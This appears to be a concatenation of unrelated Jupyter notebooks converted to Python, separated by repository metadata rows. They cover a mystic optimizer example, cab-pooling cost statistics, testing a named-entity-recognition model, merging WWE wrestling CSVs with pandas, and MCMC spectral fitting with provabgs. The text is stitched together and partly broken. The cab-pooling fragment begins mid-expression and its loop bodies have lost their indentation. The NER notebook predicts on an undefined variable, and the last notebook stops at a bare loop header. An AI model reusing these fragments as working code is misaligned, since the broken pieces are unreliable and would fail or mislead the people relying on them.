# Below, we present an example of using an ensemble of optimizers in parallel with GSAS-II to find the global minimum.
# **Note, this will take awhile. It depends on the number of processors available on your machine.**
# We set the number of function calls to 50 to limit the amount of time it will take.
# +
from mystic import tools
from mystic.solvers import BuckshotSolver
from mystic.solvers import NelderMeadSimplexSolver
from mystic.termination import VTR
from pathos.pools import ProcessPool as Pool
# set the ranges
target = [8.474, 5.394, 6.954]
lower_bounds = [x * 0.95 for x in target]
upper_bounds = [x * 1.05 for x in target]
# get number of parameters in model
ndim = len(target)
# set random seed so we can reproduce results
tools.random_seed(0)
# create a solver
solver = BuckshotSolver(dim=ndim, npts=8)
# set multi-processing pool
solver.SetMapper(Pool().map)
# since we have an search solver
# we specify what optimization algorithm to use within the search
# we tell the optimizer to not go more than 50 evaluations of our cost function
subsolver = NelderMeadSimplexSolver(ndim)
subsolver.SetEvaluationLimits(50, 50)
solver.SetNestedSolver(subsolver)
# set the range to search for all parameters
solver.SetStrictRanges(lower_bounds, upper_bounds)
# find the minimum
solver.Solve(CostFunction(ndim), VTR())
# print the best parameters
print(f"The best solution is {solver.bestSolution} with Rwp {solver.bestEnergy}")
print(f"The reference solutions is {target}")
ratios = [x / y for x, y in zip(target, solver.bestSolution)]
print(f"The ratios of to the reference values are {ratios}")
# -
# This concludes the example using GSAS-II.
dists[i] / (1000.0 * our_cab_count[i])
print("~~~~~~~~~~~~~~~~~~TOTAL Price Paid by THEM For DIFFERENT CAB TYPES~~~~~~~~~~~~~~~~~")
their_stats['cab_type_price'] = {}
their_total_price = 0
for i in range(3):
prc = price[i] * (their_cab_wise_dists[i] / 1000.0)
print('{} :{}'.format(cab_types[i], prc))
their_stats['cab_type_price'][cab_types[i]] = prc
their_total_price += prc
their_stats['total_price'] = their_total_price
print('Their Total Price: :{}'.format(their_total_price))
print("~~~~~~~~~~~~~~~~~~TOTAL Price Paid By us For DIFFERENT CAB TYPES~~~~~~~~~~~~~~~~~")
our_total_price = 0
our_stats['cab_type_price'] = {}
for i in range(3):
prc = price[i] * (our_cab_wise_dists[i] / 1000.0)
our_stats['cab_type_price'][cab_types[i]] = prc
print('{} :{}'.format(cab_types[i], prc))
our_total_price += prc
our_stats['total_price'] = our_total_price
print('Our Total Price: :{}'.format(our_total_price))
price_efficiency = their_total_price / our_total_price - 1
print("Price Efficiency: {}".format(price_efficiency))
print("~~~~~~~~~~~~~~~~~~Their Cab wise average droutes~~~~~~~~~~~~~~~~~")
their_stats['cab_wise_avg_droutes'] = {}
for typ, droutes in zip(cab_types, their_cab_wise_droutes):
print("{}: {}".format(typ, sum(droutes) / len(droutes)))
their_stats['cab_wise_avg_droutes'][typ] = sum(droutes) / len(droutes)
print("~~~~~~~~~~~~~~~~~~Our Cab wise average droutes~~~~~~~~~~~~~~~~~")
our_stats['cab_wise_avg_droutes'] = {}
for typ, droutes in zip(cab_types, our_cab_wise_droutes):
print("{}: {}".format(typ, sum(droutes) / len(droutes)))
our_stats['cab_wise_avg_droutes'][typ] = sum(droutes) / len(droutes)
print("OUR PLOT")
print("Cab Type: INDICA")
plt.bar(range(len(our_cab_wise_droutes[0])), our_cab_wise_droutes[0])
plt.show()
print("Cab Type: SUMO")
plt.bar(range(len(our_cab_wise_droutes[1])), our_cab_wise_droutes[1])
plt.show()
print("Cab Type: TT")
plt.bar(range(len(our_cab_wise_droutes[2])), our_cab_wise_droutes[2])
plt.show()
print("Cab Type: INDICA")
plt.bar(range(len(their_cab_wise_droutes[0])), their_cab_wise_droutes[0])
plt.show()
print("Cab Type: SUMO")
plt.bar(range(len(their_cab_wise_droutes[1])), their_cab_wise_droutes[1])
plt.show()
print("Cab Type: TT")
plt.bar(range(len(their_cab_wise_droutes[2])), their_cab_wise_droutes[2])
plt.show()
print("Their pool size: people count")
their_occupancy = cab_occupancy(their_pools)
our_occupancy = cab_occupancy(our_pools)
print("our Occupancy")
our_stats['occupancy'] = {}
our_stats['people_by_cab'] = {}
for i in range(3):
our_stats['people_by_cab'][cab_types[i]] = our_occupancy[i]
our_stats['occupancy'][cab_types[i]] = our_occupancy[i] / (get_seat(cab_types[i]) * our_cab_count[i])
print("CAB TYPE: {} => {}".format(cab_types[i],
our_occupancy[i] / (get_seat(cab_types[i]) * our_cab_count[i])))
print("Their Occupancy")
their_stats['occupancy'] = {}
their_stats['people_by_cab'] = {}
for i in range(3):
their_stats['people_by_cab'][cab_types[i]] = their_occupancy[i]
their_stats['occupancy'][cab_types[i]] = their_occupancy[i] / (get_seat(cab_types[i]) * their_cab_count[i])
print("CAB TYPE: {} => {}".format(cab_types[i],
their_occupancy[i] / (get_seat(cab_types[i]) * their_cab_count[i])))
print("Employee Wise droute:Ours-Red, Theirs-Blue")
plt.bar(range(len(their_employee_wise_droute)), their_employee_wise_droute)
plt.bar(range(len(our_employee_wise_droute)), our_employee_wise_droute, color='red')
plt.show()
good = 0
for i in range(len(employees)):
if their_employee_wise_droute[i] >= our_employee_wise_droute[i]:
good += 1
print("Employee Wise Distance: Ours:Red, Theirs: Blue")
plt.bar(range(len(their_employee_wise_dists)), their_employee_wise_dists)
plt.bar(range(len(our_employee_wise_dists)), our_employee_wise_dists, color='red')
'''with open('our 9 nov 12.json', 'w') as f:
f.write(json.dumps(our_stats))
with open('their 9 nov 12.json', 'w') as f:
f.write(json.dumps(their_stats))'''
# -
their_employee_wise_droute
our_pools
their_pools
| 11,662 |
/Raw versions and notes/Model_testing.ipynb
|
fe76e897066d2a5dec551d0fe70de16217e7b817
|
[] |
no_license
|
sainvo/DeepLearning_NER
|
https://github.com/sainvo/DeepLearning_NER
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 30,909 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="O26whGApdc74" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="e7771500-e93f-4ef5-b2b1-9d424032f09c"
# Test data: Never touched during training / model development, used for evaluating the final model
# !wget https://raw.githubusercontent.com/sainvo/DeepLearning_NER/master/data/test.tsv
#saved model
# !wget https://raw.githubusercontent.com/sainvo/DeepLearning_NER/master/saved_models/Adamax90.h5
# Load pretrained embeddings
# !wget -nc https://dl.fbaipublicfiles.com/fasttext/vectors-english/wiki-news-300d-1M.vec.zip
# Give -n argument so that a possible existing file isn't overwritten
# !unzip -n wiki-news-300d-1M.vec.zip
# + id="3MA3N6YJdoW3" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="4452e407-20f5-417f-8337-92fc76ab77de"
import sys
import csv
csv.field_size_limit(sys.maxsize)
# + id="5mgqPSmmdptW" colab_type="code" colab={}
token = {"word":"","entity_label":""}
def read_ontonotes(tsv_file):
    """Yield sentences from an OntoNotes-style TSV file.

    Sentences are separated by blank lines; each yielded sentence is a
    list of csv rows (one row per non-blank line). A trailing sentence
    with no terminating blank line is also yielded.
    """
    sentence = []
    with open(tsv_file) as handle:
        # delimiter='\n' means each physical line stays a single field
        for row in csv.reader(handle, delimiter='\n'):
            if row:
                sentence.append(row)
            elif sentence:
                # blank line: sentence boundary
                yield sentence
                sentence = []
    # flush the last sentence if the file did not end with a blank line
    if sentence:
        yield sentence
full_test_data = list(read_ontonotes('test.tsv'))
#size_ts = int(len(full_test_data)/2)
#print(size_ts)
test_data_sample = full_test_data[:500]
# + id="2_xrpyV1d2Tt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="f619bfd4-aea3-4a11-b215-d0b9ec5f7aa2"
import re
#regex for empty space chars, \t \n
tab = re.compile('[\t]')
def clean(sentences):
    """Split raw one-field csv rows into [word, tag] token pairs.

    sentences: list of sentences, each a list of csv rows (lists of
    strings) as produced by ``read_ontonotes``.

    Rows containing exactly one tab become a single ``[word, tag]`` pair
    (dropped when the word is ``'.'``). Rows containing several tabs are
    quoted multi-line tokens: they are split on newlines, the first and
    last pieces get a leading ``'"'`` restored, and every piece is split
    into a pair. Rows with no tab are dropped.

    Returns a new list of cleaned sentences.
    """
    # Fixes: parameters/locals previously shadowed the builtins `list`
    # and `str`; commented-out debug prints removed; the duplicated
    # re.split branch collapsed.
    clean_data = []
    for sent in sentences:
        clean_list = []
        for item in sent:
            text = ''.join(item)
            tab_count = len(re.findall(r"\t", text))
            if tab_count == 1:
                pair = re.split("\t", text)
                if pair[0] != '.':
                    clean_list.append(pair)
            elif tab_count > 1:
                pieces = re.split("\n", text)
                for i in range(len(pieces)):
                    if i == 0 or i == len(pieces) - 1:
                        # restore the quote character lost in extraction
                        pieces[i] = '"' + pieces[i]
                    pieces[i] = re.split("\t", pieces[i])
                    clean_list.append(pieces[i])
        clean_data.append(clean_list)
    return clean_data
test_data_clean = clean(test_data_sample)
print(len(test_data_clean))
for item in test_data_clean[:3]:
print(item)
# + id="qogWYHhFeBby" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 54} outputId="c5d3298b-5b1b-4a60-a277-09a78ca9b7ef"
# shape into dicts per sentence
def reshape_sent2dicts(f):
    """Reshape token-pair sentences into per-sentence dicts.

    f: iterable of sentences, each a list of ``[word, tag]`` tokens.
    Tokens that are not exactly two elements long are skipped.

    Returns a list of ``{'text': [...words...], 'tags': [...tags...]}``
    dicts, one per sentence.
    """
    reshaped = []
    for sentence in f:
        pairs = [tok for tok in sentence if len(tok) == 2]
        reshaped.append({
            'text': [tok[0] for tok in pairs],
            'tags': [tok[1] for tok in pairs],
        })
    return reshaped
test_data_sent = list(reshape_sent2dicts(test_data_clean[:30000]))
print(test_data_sent[:3])
# + id="u7St12VBeDQD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="a3fe5bd1-dc21-4c76-a237-f32debae6ba2"
import random
import numpy
random.seed(123)
random.shuffle(test_data_sent)
print(type(test_data_sent))
print(type(test_data_sent[0]))
test_texts=[i["text"] for i in test_data_sent]
test_labels=[i["tags"] for i in test_data_sent]
#print(type(train_texts))
#print(type(train_texts[0]))
print('Text: ', test_texts[:4])
print('Labels: ', test_labels[:4])
# + id="jMf-ISgaeRYZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 173} outputId="0f258ab1-ae05-4d8b-bfbd-55e83d72ce59"
from gensim.models import KeyedVectors
vector_model = KeyedVectors.load_word2vec_format("wiki-news-300d-1M.vec", binary=False, limit=50000)
# sort based on the index to make sure they are in the correct order
words = [k for k, v in sorted(vector_model.vocab.items(), key=lambda x: x[1].index)]
print("Words from embedding model:", len(words))
print("First 50 words:", words[:50])
# Normalize the vectors to unit length
print("Before normalization:", vector_model.get_vector("in")[:10])
vector_model.init_sims(replace=True)
print("After normalization:", vector_model.get_vector("in")[:10])
# + id="8fPUHHMseSHx" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="ef0502fa-591f-4eb7-bde8-86104fe2841e"
# Build vocabulary mappings
# Zero is used for padding in Keras, prevent using it for a normal word.
# Also reserve an index for out-of-vocabulary items.
vocabulary={
"<PAD>": 0,
"<OOV>": 1
}
for word in words: # These are words from the word2vec model
vocabulary.setdefault(word, len(vocabulary))
print("Words in vocabulary:",len(vocabulary))
inv_vocabulary = { value: key for key, value in vocabulary.items() } # invert the dictionary
# Embedding matrix
def load_pretrained_embeddings(vocab, embedding_model):
    """Build an embedding matrix whose rows line up with *vocab*.

    vocab: word -> row-index mapping from the data vectorizer (index 0 is
        reserved for the padding token).
    embedding_model: gensim KeyedVectors holding the pretrained vectors.

    Rows for words present in the pretrained model are copied from it; all
    other rows keep a small random initialization, except row 0 which stays
    all-zero for padding.  Prints how many vocabulary words were found.
    """
    dim = embedding_model.vectors.shape[1]
    # Random init for every non-padding row, then prepend the zero padding row.
    matrix = numpy.random.uniform(low=-0.05, high=0.05, size=(len(vocab) - 1, dim))
    matrix = numpy.vstack((numpy.zeros(shape=(1, dim)), matrix))
    found = 0
    for word, idx in vocab.items():
        if word not in embedding_model.vocab:
            continue
        matrix[idx] = embedding_model.get_vector(word)
        found += 1
    print("Found pretrained vectors for {found} words.".format(found=found))
    return matrix
pretrained=load_pretrained_embeddings(vocabulary, vector_model)
# + id="kth-bcYvfE2l" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 544} outputId="6dc3f27c-aca0-4c61-ea9f-58a2cbf3cd29"
#Labels
from pprint import pprint
not_letter = re.compile(r'[^a-zA-Z]')
# Label mappings
# 1) gather a set of unique labels
label_set = set()
for sentence_labels in test_labels: #loops over sentences
#print(sentence_labels)
for label in sentence_labels: #loops over labels in one sentence
# match = not_letter.match(label)
#if match or label== 'O':
# break
#else:
label_set.add(label)
# 2) index these
label_map = {}
for index, label in enumerate(label_set):
label_map[label]=index
pprint(label_map)
# + id="JgXn15G4fJAf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="8550092f-cb89-4948-e917-ebdd114cb14c"
# vectorize the labels
def label_vectorizer(train_labels, label_map):
    """Map each sentence's label strings to integer ids.

    train_labels: list of sentences, each a list of label strings.
    label_map: label string -> integer id.

    Returns a 1-D numpy object array whose elements are lists of ids
    (sentences keep their original, possibly different, lengths).

    NOTE: labels missing from *label_map* are silently dropped, which can
    shift the token/label alignment -- callers should make sure the map
    covers every label they pass in.
    """
    vectorized_labels = []
    # Bug fix: iterate the *parameter*, not the global `test_labels`, so the
    # function works for any label set it is given.
    for sentence_labels in train_labels:
        vectorized_labels.append(
            [token for token in map(label_map.get, sentence_labels) if token is not None]
        )
    # dtype=object keeps ragged (unequal-length) rows valid on modern numpy,
    # where implicitly creating a ragged array raises a ValueError.
    vectorized_labels = numpy.array(vectorized_labels, dtype=object)
    return vectorized_labels
vectorized_labels = label_vectorizer(test_labels,label_map)
#validation_vectorized_labels = label_vectorizer(dev_labels,label_map)
pprint(vectorized_labels[0])
# + id="wjUqBVFTe079" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="1ae13744-b9e2-4aa3-b441-210cb61d1305"
## vectorization of the text
def text_vectorizer(vocab, test_texts):
    """Turn tokenized sentences into integer id sequences.

    vocab: word -> integer id mapping (0 is the padding id, 1 the
        out-of-vocabulary id).
    test_texts: list of sentences, each a list of token strings.

    Returns (vectorized_data, sentence_lengths) where vectorized_data is a
    1-D numpy object array of id lists and sentence_lengths holds the token
    count of each sentence.
    """
    vectorized_data = []   # text turned into numbers via the vocabulary mapping
    sentence_lengths = []  # number of tokens in each sentence
    for one_example in test_texts:
        # 1 is the index reserved for out-of-vocabulary tokens.
        vectorized_data.append([vocab.get(word, 1) for word in one_example])
        sentence_lengths.append(len(one_example))
    # dtype=object keeps ragged (unequal-length) rows valid on modern numpy,
    # where implicitly creating a ragged array raises a ValueError.
    vectorized_data = numpy.array(vectorized_data, dtype=object)
    return vectorized_data, sentence_lengths
vectorized_data, lengths=text_vectorizer(vocabulary, test_texts)
#validation_vectorized_data, validation_lengths=text_vectorizer(vocabulary, dev_texts)
pprint(test_texts[0])
pprint(vectorized_data[0])
# + id="62LxLsa1yCuM" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="1ab9f432-2757-49eb-e0f1-43b9de9d2c08"
# padding for tensor
import tensorflow as tf
### Only needed for me, not to block the whole GPU, you don't need this stuff
#from keras.backend.tensorflow_backend import set_session
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.3
#set_session(tf.Session(config=config))
### ---end of weird stuff
from keras.preprocessing.sequence import pad_sequences
print("Old shape:", vectorized_data.shape)
vectorized_data_padded=pad_sequences(vectorized_data, padding='pre', maxlen=max(lengths))
print("New shape:", vectorized_data_padded.shape)
print("First example:")
print( vectorized_data_padded[0])
# Even with the sparse output format, the shape has to be similar to the one-hot encoding
vectorized_labels_padded=numpy.expand_dims(pad_sequences(vectorized_labels, padding='pre', maxlen=max(lengths)), -1)
print("Padded labels shape:", vectorized_labels_padded.shape)
pprint(label_map)
print("First example labels:")
pprint(vectorized_labels_padded[0])
weights = numpy.copy(vectorized_data_padded)
weights[weights > 0] = 1
print("First weight vector:")
print( weights[0])
# + id="eH1CNZPZt20e" colab_type="code" colab={}
from tensorflow.keras.models import load_model
model_EL = load_model('Adamax90.h5')
# + id="bhAgPfI_xPBD" colab_type="code" colab={}
model_EL.predict_classes(test)
| 10,665 |
/02-Matplotlib-Project/01-Stu_WinnerWrestling-Part1/Unsolved/.ipynb
|
e735aa743f580ffecb12d9912f19cea02c53d349
|
[] |
no_license
|
Fraolabebe/Matplotlib_Challenge
|
https://github.com/Fraolabebe/Matplotlib_Challenge
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 42,945 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Winning Wrestlers Entertainment
#
# # In this activity you will be taking four separate csvs that were scraped down from a wrestling database, merging them together, and then creating charts to visualize a wrestler's wins and losses over the course of four years.
#
# ### Part 1 - Macho Merging
#
# * You will likely need to perform three different merges over the course of this activity, changing the names of your columns as you go along.
# Import the necessary modules
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as st
import numpy as np
# +
wrestling_2013 = "../Resources/WWE-Data-2013.csv"
wrestling_2014 = "../Resources/WWE-Data-2014.csv"
wrestling_2015 = "../Resources/WWE-Data-2015.csv"
wrestling_2016 = "../Resources/WWE-Data-2016.csv"
wrestlers2013_df = pd.read_csv(wrestling_2013)
wrestlers2014_df = pd.read_csv(wrestling_2014)
wrestlers2015_df = pd.read_csv(wrestling_2015)
wrestlers2016_df = pd.read_csv(wrestling_2016)
# -
# Merge the first two datasets (2013 and 2014) on "Wrestler" so that no data is lost (should be 182 rows)
merged_df = pd.merge(wrestlers2013_df, wrestlers2014_df, how= 'outer', on= 'Wrestler')
merged_df.head()
# +
# Rename our _x columns to "2013 Wins", "2013 Losses", and "2013 Draws"
# Rename our _y columns to "2014 Wins", "2014 Losses", and "2014 Draws"
merged_df = merged_df.rename(columns={"Wins_x": "2013 Wins", "Losses_x": "2013 Losses", "Draws_x": "2013 Draws",
"Wins_y": "2014 Wins", "Losses_y": "2014 Losses", "Draws_y": "2014 Draws"})
merged_df
# -
# Merge our newly combined dataframe with the 2015 dataframe
merged_df = pd.merge(merged_df, wrestlers2015_df, how= 'outer', on= 'Wrestler')
merged_df
# Rename "wins", "losses", and "draws" to "2015 Wins", "2015 Losses", and "2015 Draws.
merged_df = merged_df.rename(columns={"Wins": "2015 Wins", "Losses": "2015 Losses", "Draws": "2015 Draws"})
merged_df
# Merge our newly combined dataframe with the 2016 dataframe
merged_df = pd.merge(merged_df, wrestlers2016_df, how= 'outer', on= 'Wrestler')
merged_df.head()
# +
# Rename "wins", "losses", and "draws" to "2016 Wins", "2016 Losses", and "2016 Draws"
merged_df = merged_df.rename(columns={"Wins": "2016 Wins", "Losses": "2016 Losses", "Draws": "2016 Draws"})
merged_df
| 2,568 |
/nb/mocha_s2_provabgs.ipynb
|
da9fb9c7774b24962051d85aedcb5b8dd9adfc94
|
[
"MIT"
] |
permissive
|
changhoonhahn/gqp_mc
|
https://github.com/changhoonhahn/gqp_mc
| 3 | 7 | null | 2020-11-28T11:53:54 | 2020-11-16T14:33:30 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 10,181,234 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: gqp
# language: python
# name: gqp
# ---
# # Mock Challenge Level 2 Spectra --- `provabgs` mocks
import os
import pickle
import numpy as np
# --- plotting ---
import corner as DFM
import matplotlib as mpl
import matplotlib.pyplot as plt
#if 'NERSC_HOST' not in os.environ.keys():
# mpl.rcParams['text.usetex'] = True
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['axes.linewidth'] = 1.5
mpl.rcParams['axes.xmargin'] = 1
mpl.rcParams['xtick.labelsize'] = 'x-large'
mpl.rcParams['xtick.major.size'] = 5
mpl.rcParams['xtick.major.width'] = 1.5
mpl.rcParams['ytick.labelsize'] = 'x-large'
mpl.rcParams['ytick.major.size'] = 5
mpl.rcParams['ytick.major.width'] = 1.5
mpl.rcParams['legend.frameon'] = False
import gqp_mc.util as UT
from provabgs import infer as Infer
from provabgs import models as Models
# # read mock spectra
# +
theta_obs = pickle.load(open('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/l2.theta.p', 'rb'))
wave_obs = np.load('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/mocha_s2.wave.npy')
flux_obs = np.load('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/mocha_s2.flux.npy')
ivar_obs = np.load('/global/cscratch1/sd/chahah/gqp_mc/mini_mocha/mocha_s2.ivar.npy')
# -
fig = plt.figure(figsize=(15,5))
sub = fig.add_subplot(111)
for f in flux_obs[:3]:
sub.plot(wave_obs, f)
sub.set_xlabel('wavelength')
sub.set_xlim(3.6e3, 1e4)
sub.set_ylim(0., 20)
# # load in MCMC chains run on cori
# +
prior = Infer.load_priors([
Infer.UniformPrior(7.5, 12.5, label='sed'),
Infer.FlatDirichletPrior(4, label='sed'), # flat dirichilet priors
Infer.UniformPrior(0., 1., label='sed'), # burst fraction
Infer.UniformPrior(1e-2, 13.27, label='sed'), # tburst
Infer.LogUniformPrior(4.5e-5, 1.5e-2, label='sed'),# uniform priors on ZH coeffb
Infer.LogUniformPrior(4.5e-5, 1.5e-2, label='sed'),# uniform priors on ZH coeff
Infer.UniformPrior(0., 3., label='sed'), # uniform priors on dust1
Infer.UniformPrior(0., 3., label='sed'), # uniform priors on dust2
Infer.UniformPrior(-2, 1, label='sed') # uniform priors on dust_index
])
m_nmf = Models.NMF(burst=True, emulator=True)
desi_mcmc = Infer.desiMCMC(model=m_nmf, prior=prior)
# -
chain_dir = os.path.join(UT.dat_dir(), 'mini_mocha', 'L2')
f_chain = lambda i: os.path.join(chain_dir, 'S2.provabgs.%i.chain.p' % i)
igals, chains = [], []
for i in range(3000):
if os.path.isfile(f_chain(i)):
igals.append(i)
chains.append(pickle.load(open(f_chain(i), 'rb')))
print(len(igals))
# examine the chains
for i, chain in zip(igals[:3], chains):
unt_theta_bf = prior.untransform(chain['theta_bestfit'])
fig = plt.figure(figsize=(10, 10))
for ii in range(unt_theta_bf.shape[0]-1):
sub = fig.add_subplot(unt_theta_bf.shape[0]-1, 1, ii+1)
for j in range(30):
unt_chain_i = desi_mcmc.prior.untransform(chain['mcmc_chain'][:,j,:])
sub.plot(unt_chain_i[:,ii], c='k', lw=0.5)
if ii == 0: sub.axhline(theta_obs['logM_fiber'][i], color='C0')
sub.axhline(unt_theta_bf[ii], color='C1')
sub.set_xlim(0,2500)
# examine the chains
for i, chain in zip(igals[:3], chains):
unt_theta_bf = prior.untransform(chain['theta_bestfit'])
unt_chain = prior.untransform(desi_mcmc._flatten_chain(chain['mcmc_chain'][:1500,:,:]))
fig = DFM.corner(unt_chain)
axes = np.array(fig.axes).reshape((unt_theta_bf.shape[0], unt_theta_bf.shape[0]))
# Loop over the histograms
for yi in range(unt_theta_bf.shape[0]):
for xi in range(yi):
ax = axes[yi, xi]
ax.axvline(unt_theta_bf[xi], color="r")
ax.axhline(unt_theta_bf[yi], color="r")
ax.plot(unt_theta_bf[xi], unt_theta_bf[yi], "sr")
# examine the chains
for i, chain in zip(igals[:10], chains):
fig = plt.figure(figsize=(6,1))
sub = fig.add_subplot(111)
sub.plot(wave_obs, flux_obs[i], c='k', lw=1)
sub.plot(chain['wavelength_obs'], chain['flux_spec_model'], c='C1', ls='--', lw=1)
sub.set_xlim(3e3, 1e4)
sub.set_ylim(0, 3*np.max(chain['flux_spec_model'][wave_obs > 5000]))
# +
flat_chains = []
logMstar_true, logMstar_inf = [], []
logSFR_true, logSFR_inf = [], []
logSSFR_true, logSSFR_inf = [], []
logZ_MW_true, logZ_MW_inf = [], []
tage_MW_true, tage_MW_inf = [], []
tauism_true, tauism_inf = [], []
for i, chain in zip(igals, chains):
flat_chain = desi_mcmc._flatten_chain(chain['mcmc_chain'][1500:,:,:])
flat_chains.append(flat_chain)
z_obs = theta_obs['redshift'][i]
logMstar_true.append(theta_obs['logM_fiber'][i])
logMstar_inf.append(flat_chain[:,0])
logSSFR_true.append(np.log10(theta_obs['sfr_1gyr'][i]) - theta_obs['logM_total'][i])
logSSFR_inf.append(np.log10(m_nmf.avgSFR(flat_chain, zred=z_obs, dt=1.0)) - flat_chain[:,0])
logSFR_true.append(np.log10(theta_obs['sfr_1gyr'][i]) - (theta_obs['logM_total'][i] - theta_obs['logM_fiber'][i]))
logSFR_inf.append(np.log10(m_nmf.avgSFR(flat_chain, zred=z_obs, dt=1.0)))
logZ_MW_true.append(np.log10(theta_obs['Z_MW'])[i])
logZ_MW_inf.append(np.log10(m_nmf.Z_MW(flat_chain, zred=z_obs)))
tage_MW_true.append(theta_obs['t_age_MW'][i])
tage_MW_inf.append(m_nmf.tage_MW(flat_chain, zred=z_obs))
tauism_true.append(theta_obs['tau_ism'][i])
tauism_inf.append(flat_chain[:,-2])
flat_chains = np.array(flat_chains)
logMstar_true = np.array(logMstar_true)
logMstar_inf = np.array(logMstar_inf)
logSSFR_true = np.array(logSSFR_true).flatten()
logSSFR_inf = np.array(logSSFR_inf)
logSFR_true = np.array(logSFR_true).flatten()
logSFR_inf = np.array(logSFR_inf)
logZ_MW_true = np.array(logZ_MW_true).flatten()
logZ_MW_inf = np.array(logZ_MW_inf)
tage_MW_true = np.array(tage_MW_true).flatten()
tage_MW_inf = np.array(tage_MW_inf)
tauism_true = np.array(tauism_true)
tauism_inf = np.array(tauism_inf)
# -
props_chain = np.stack([logMstar_inf, logSFR_inf, logZ_MW_inf, tage_MW_inf, tauism_inf], axis=2)
props_truth = np.stack([logMstar_true, logSFR_true, logZ_MW_true, tage_MW_true, tauism_true], axis=1)
# +
# save compiled chains and properties to file
# flat chains
np.save(os.path.join(chain_dir, 'S2.flat_chains.npy'), flat_chains)
# proerties
np.save(os.path.join(chain_dir, 'S2.prop_chains.npy'), props_chain)
np.save(os.path.join(chain_dir, 'S2.prop_truths.npy'), props_truth)
# -
# lets calculate the median, +/- sigma for each of the derived properties
logm_q = np.array([DFM.quantile(logMstar_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
logssfr_q = np.array([DFM.quantile(logSSFR_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
logzmw_q = np.array([DFM.quantile(logZ_MW_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
tagemw_q = np.array([DFM.quantile(tage_MW_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
tauism_q = np.array([DFM.quantile(tauism_inf[i], [0.16, 0.5, 0.84]) for i in range(flat_chains.shape[0])])
# +
fig = plt.figure(figsize=(20,10))
sub = fig.add_subplot(231)
sub.errorbar(logMstar_true, logm_q[:,1],
yerr=[logm_q[:,1]-logm_q[:,0], logm_q[:,2]-logm_q[:,1]],
fmt='.C0')
sub.plot([8., 12.], [8., 12], c='k', ls='--')
sub.text(0.05, 0.95, r'$\log M_*$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.set_xlim(8., 12.)
sub.set_ylim(8., 12.)
sub = fig.add_subplot(232)
sub.errorbar(logSSFR_true, logssfr_q[:,1],
yerr=[logssfr_q[:,1]-logssfr_q[:,0], logssfr_q[:,2]-logssfr_q[:,1]],
fmt='.C0')
sub.plot([-9., -15.], [-9., -15], c='k', ls='--')
sub.text(0.05, 0.95, r'$\log {\rm SSFR}_{1Gyr}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.set_xlim(-14, -9.)
sub.set_ylim(-14, -9.)
sub = fig.add_subplot(233)
sub.errorbar(logZ_MW_true, logzmw_q[:,1],
yerr=[logzmw_q[:,1] - logzmw_q[:,0], logzmw_q[:,2] - logzmw_q[:,1]],
fmt='.C0')
sub.text(0.05, 0.95, r'$\log Z_{\rm MW}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.plot([-3., -1], [-3, -1], c='k', ls='--')
sub.set_xlim(-3., -1)
sub.set_ylim(-3., -1)
sub = fig.add_subplot(234)
sub.errorbar(tage_MW_true, tagemw_q[:,1],
yerr=[tagemw_q[:,1] - tagemw_q[:,0], tagemw_q[:,2] - tagemw_q[:,1]],
fmt='.C0')
sub.text(0.05, 0.95, r'$t_{\rm age, MW}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.plot([0., 13.2], [0., 13.2], c='k', ls='--')
sub.set_xlim(0., 13.2)
sub.set_ylim(0., 13.2)
sub = fig.add_subplot(235)
sub.errorbar(tauism_true, tauism_q[:,1],
yerr=[tauism_q[:,1] - tauism_q[:,0], tauism_q[:,2] - tauism_q[:,1]],
fmt='.C0')
sub.text(0.05, 0.95, r'$\tau_{\rm ISM}$', transform=sub.transAxes, ha='left', va='top', fontsize=20)
sub.plot([0., 3.], [0., 3.], c='k', ls='--')
sub.set_xlim(0., 3)
sub.set_ylim(0., 3)
# -
dlogMstar = logMstar_inf - logMstar_true[:,None]
dlogSSFR = logSSFR_inf - logSSFR_true[:,None]
dlogZ_MW = logZ_MW_inf - logZ_MW_true[:,None]
dtage_MW = tage_MW_inf - tage_MW_true[:,None]
dtau_ism = tauism_inf - tauism_true[:,None]
fig = plt.figure(figsize=(12,20))
for i, dprop, prop in zip(range(4), [dlogMstar, dlogSSFR, dlogZ_MW, dtage_MW, dtau_ism], [logMstar_true, logSSFR_true, logZ_MW_true,tage_MW_true, tauism_true]):
sub = fig.add_subplot(5,1,i+1)
